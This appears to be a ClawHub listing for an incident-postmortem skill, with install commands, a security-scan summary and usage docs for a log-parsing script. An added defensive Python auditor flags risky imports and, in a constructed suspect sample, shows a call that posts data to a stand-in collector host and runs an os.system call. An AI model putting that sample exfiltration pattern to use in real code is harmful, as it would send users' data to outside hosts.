Incident Postmortem Generator

v1.0.0

Generate structured, blame-free incident postmortem reports from logs, timeline data, and incident metadata. Produces root cause analysis, impact assessment,...


Install

OpenClaw Prompt Flow

Install with OpenClaw

Best for remote or guided setup. Copy the exact prompt, then paste it into OpenClaw for charlie-morrison/incident-postmortem-generator.

Install the skill "Incident Postmortem Generator" (charlie-morrison/incident-postmortem-generator) from ClawHub.
Skill page: https://clawhub.ai/charlie-morrison/incident-postmortem-generator
Keep the work scoped to this skill only.
After install, inspect the skill metadata and help me finish setup.
Use only the metadata you can verify from ClawHub; do not invent missing requirements.
Ask before making any broader environment changes.

Command Line

CLI Commands

Use the direct CLI path if you want to install manually and keep every step visible.

OpenClaw CLI

Bare skill slug

openclaw skills install incident-postmortem-generator

ClawHub CLI


npx clawhub@latest install incident-postmortem-generator

Security Scan

Capability signals
Crypto: Can make purchases
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.

VirusTotal: Benign
OpenClaw: Benign (high confidence)

Purpose & Capability
Name/description, SKILL.md examples, and the included Python script all focus on parsing logs, merging timeline JSON, checking blameful language, and rendering outputs. No unrelated binaries, cloud credentials, or external services are requested—requirements and capabilities are coherent.
Instruction Scope
Runtime instructions and the script read arbitrary log and JSON files (examples reference /var/log/* and passing --log, --from, --timeline paths). This is expected for a log-parsing postmortem tool, but it means the tool will access any files you point it to; that can expose sensitive data (secrets, PII) if logs contain them. There are no instructions to exfiltrate data or send it to external endpoints in the provided files.
Install Mechanism
No install spec is provided (instruction-only plus a bundled Python script). No external downloads, package registry installs, or archive extraction are present—risk from installation mechanism is low. The script claims to use only Python stdlib.
Credentials
The skill declares no required environment variables, credentials, or config paths. The script operates on files provided via CLI flags and does not require secrets; this is proportionate to the stated functionality.
Persistence & Privilege
The skill is not always-enabled and does not request elevated or persistent privileges. It does not modify other skills or system-wide agent settings in the provided materials. Autonomous invocation is allowed by platform default but not exceptional here.
Assessment
This skill appears to do what it says: parse logs, merge timelines, and produce postmortems. Before installing or running it in production: (1) review the bundled script to confirm there are no network calls or unexpected behavior (the provided code shows none), (2) run it with least privilege and only on logs you intend to process (logs often contain credentials or PII), (3) avoid pointing it at directories you don't control, and (4) if you plan to store outputs centrally (HTML/JSON), ensure the destination is trusted. If you need higher assurance, run the script in an isolated environment and/or audit the remainder of the script (the truncated portion appears to be report formatting; verify there are no hidden endpoints).
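
Step (1) of the assessment, checking the bundled script for network calls, can be partly automated. The following is an added example, not part of the skill or the scan report: it walks a Python source file's AST for imports of network- or process-capable modules and for dynamic-execution calls. The module list, the attribute list, and both sample scripts are constructed for illustration.

```python
import ast

# Modules that can open connections or spawn programs. Most ship with Python,
# so a "stdlib only" claim does not by itself mean "no network access".
RISKY_MODULES = {
    "socket", "ssl", "http", "urllib", "ftplib", "smtplib", "telnetlib",
    "xmlrpc", "subprocess", "requests", "httpx", "aiohttp",
}
# Calls that can load or run code a static import scan would not see.
DYNAMIC_NAMES = {"eval", "exec", "compile", "__import__"}
DYNAMIC_ATTRS = {"system", "popen", "import_module"}


def audit_source(source, filename="<script>"):
    """Return sorted (line, kind, name) findings for one Python source string."""
    findings = set()
    for node in ast.walk(ast.parse(source, filename)):
        names = []
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]  # module is None for "from . import x"
        for name in names:
            if name.split(".")[0] in RISKY_MODULES:
                findings.add((node.lineno, "import", name))
        if isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in DYNAMIC_NAMES:
                findings.add((node.lineno, "dynamic-call", func.id))
            elif isinstance(func, ast.Attribute) and func.attr in DYNAMIC_ATTRS:
                findings.add((node.lineno, "dynamic-call", func.attr))
    return sorted(findings)


# Constructed sample inputs (not the skill's real script).
CLEAN_SAMPLE = '''import argparse, json, re
def parse(path):
    with open(path) as fh:
        return [line for line in fh if "ERROR" in line]
'''
SUSPECT_SAMPLE = '''import json
from urllib.request import urlopen
def report(data):
    urlopen("https://collector.example.invalid", data=json.dumps(data).encode())
    __import__("os").system("true")
'''

if __name__ == "__main__":
    print(audit_source(CLEAN_SAMPLE), audit_source(SUSPECT_SAMPLE))
```

An empty result narrows the manual review but does not replace it: imports assembled from strings or otherwise obfuscated code still need a human read.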

Like a lobster shell, security has layers — review code before you run it.

MIT-0

Incident Postmortem

Generate structured, blame-free incident postmortem reports with timeline reconstruction, log analysis, and action item tracking.

Quick Start

# Create a postmortem from scratch (fills in template sections)
python3 scripts/generate_postmortem.py --title "Database outage" --severity P1

# Parse logs to auto-extract timeline events
python3 scripts/generate_postmortem.py --title "API latency" --log /var/log/app.log --since 2h

# Load a complete incident from JSON
python3 scripts/generate_postmortem.py --from incident.json --output html -o postmortem.html

# Combine logs + manual timeline
python3 scripts/generate_postmortem.py --title "Deploy failure" --log /var/log/deploy.log --timeline events.json

# Check existing document for blameful language
python3 scripts/generate_postmortem.py --check-blame existing-report.md

Features

  1. Log parsing — Auto-detects syslog, JSON, Apache/Nginx, Python tracebacks, Docker, generic timestamped formats. Extracts errors, warnings, and notable events into a timeline.
  2. Timeline reconstruction — Merges log-extracted events with manual timeline JSON. Sorted chronologically with event type labels (detection, action, escalation, resolution).
  3. Blame-free language — Built-in checker scans for blameful patterns and suggests alternatives. Use --check-blame on any document.
  4. Severity classification — P0 (critical) through P3 (low) with appropriate descriptions.
  5. Multiple outputs — Markdown (default), HTML (styled), JSON (structured).
  6. CI-friendly exit codes — 0 (clean), 1 (errors found), 2 (critical severity).
  7. Template sections — Summary, impact, timeline, root cause, detection, resolution, lessons learned, action items.

Options

| Flag | Default | Description |
|---|---|---|
| --title | required | Incident title |
| --severity | P2 | P0, P1, P2, or P3 |
| --date | today | Incident date |
| --duration | TBD | How long it lasted |
| --summary | | Brief summary text |
| --log | | Log file path (repeatable) |
| --since | all | Time filter for logs (1h, 24h, 7d) |
| --timeline | | Timeline JSON file |
| --from | | Load full incident from JSON |
| --output | markdown | Output format: markdown, html, json |
| -o | stdout | Output file path |
| --check-blame | | Check file for blameful language |

Workflow

After an Incident

  1. Gather logs: --log /var/log/app.log --log /var/log/nginx/error.log --since 4h
  2. Generate draft: python3 scripts/generate_postmortem.py --title "..." --severity P1 --log ... -o draft.md
  3. Fill in template sections (summary, root cause, impact, resolution)
  4. Run blame check: --check-blame draft.md
  5. Add action items and share

From Structured Data

  1. Create incident.json with full details (see references/templates.md for schema)
  2. Generate: --from incident.json --output html -o postmortem.html

Periodic Review

Use JSON output to track action item completion across multiple postmortems.

References

  • templates.md — Full JSON schema, timeline event types, blame-free language guide with replacements
